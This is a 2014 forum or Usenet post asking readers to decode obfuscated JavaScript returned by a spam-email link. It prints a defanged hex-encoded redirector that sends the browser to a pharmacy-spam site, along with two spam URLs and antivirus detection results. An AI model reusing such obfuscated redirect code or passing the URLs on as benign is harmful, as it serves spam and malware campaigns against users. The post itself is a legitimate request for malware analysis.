| Subject: | Can anyone ID or decode this javascript? (Feb 17 / 2014) |
| Posted by: | Virus Guy (Viru…@Guy. com) |
| Date: | Mon, 17 Feb 2014 |
The following link was contained in a spam email. It probably tries to
trigger a browser exploit of some sort, so handle this with care:
hxxp://202.29.80.23/~info/sensors.php
The server responds with this:
============
<html><body><script type="text/hello">ykzjr1="\x30";
lufrv2="\x68\x74\x74\x70\x3A\x2F\x2F\x6E\x75\x72\x73\x69\x6E\x67\x70\x68\x61\x72\x6D\x2E\x63\x6F\x6D";
setTimeout("\x77\x69\x6E\x64\x6F\x77\x2E\x74\x6F\x70\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x3D\x6C\x75\x66\x72\x76\x32\x3B",ykzjr1);
</script></body></html>
=============
Just in case the above would have executed for some readers, I replaced
"javascript" with "hello" on the first line. The above would have given
this news server a "line too long" error, so I broke the line after the
";" in various locations (if it matters).
What does that script decode to, or try to do?
Is there an on-line javascript decoder that would have processed the
above and given some sort of report or decoded result?
VT URL scan gives 2 / 53 in terms of detection as a malicious site
(based on IP / domain of URL and not on contents or files returned?)
VT scan on "sensors.php" returns 2 / 50:
Avast JS:Redirector-BOX [Trj]
Ikarus JS.Redirector
Another URL from another recent spam:
hxxp://snipsandclips4kids.com/restate.php